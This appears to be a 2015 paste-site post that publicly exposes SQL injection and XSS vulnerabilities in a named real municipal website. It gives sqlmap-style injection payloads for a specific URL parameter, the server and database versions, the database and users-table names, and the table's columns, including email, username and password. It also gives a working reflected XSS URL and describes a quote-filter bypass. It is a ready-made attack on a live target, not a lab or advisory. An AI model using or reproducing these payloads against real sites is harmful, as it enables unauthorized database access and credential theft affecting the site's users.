imwoodythecowboy

XSS and SQLi vulnerable site ;)

Dec 12th, 2015
[ASCII-art banner: WOODY THE COWBOY]

[ASCII-art banner: SQLI]

sanjavier.es/contenidos.php?id=25

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=25 AND 3543=3543

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=25 AND (SELECT 4629 FROM(SELECT COUNT(*),CONCAT(0x7176766b71,(SELECT (ELT(4629=4629,1))),0x716a626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=25 AND (SELECT * FROM (SELECT(SLEEP(5)))yEFx)

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: id=-2136 UNION ALL SELECT NULL,NULL,CONCAT(0x7176766b71,0x42646e456e6c49766d7a,0x716a626271),NULL,NULL--
---

Apache 2, PHP 5.2.17
MySQL is 5.0.12

Database names:
information_schema
sanjavier_ayuntamiento

Database sanjavier_ayuntamiento
Table ay_usuarios

IdUsuario,Admin,Email,Acceso,Perfil,Nombre,Usuario,Password,permisos,Verificado

[ASCII-art banner: XSS]

http://sanjavier.es/buscar.php?buscar=%3Cmarquee+behavior%3Dalternate%3ERIP+ASF%3C%2Fmarquee%3E&bs=Buscar
It filters the " chars and replaces them with \", so I employed String.fromCharCode.
It is a non-persistent XSS.

This site receives an average of 500k visits a month, btw ;)